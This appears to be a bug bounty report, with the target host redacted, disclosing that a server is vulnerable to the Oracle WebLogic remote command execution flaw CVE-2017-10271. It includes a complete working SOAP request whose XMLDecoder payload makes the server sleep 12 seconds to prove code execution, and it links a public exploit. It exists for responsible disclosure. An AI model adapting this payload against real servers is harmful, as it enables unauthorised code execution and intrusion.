Summary:
Happy Friday! The server at ██████
is vulnerable to CVE-2017-10271 “Oracle WebLogic Server Remote Command Execution”.
Description:
The following request takes 12 seconds (12000 milliseconds) to complete:
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep">
<long>12000</long>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
This proves that I have Java code execution on the remote server.
Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271
I was not able to use that script with a ping
command, which might have been blocked by preventing outbound connections.
Patch & possibly don’t allow external access.
Critical, RCE.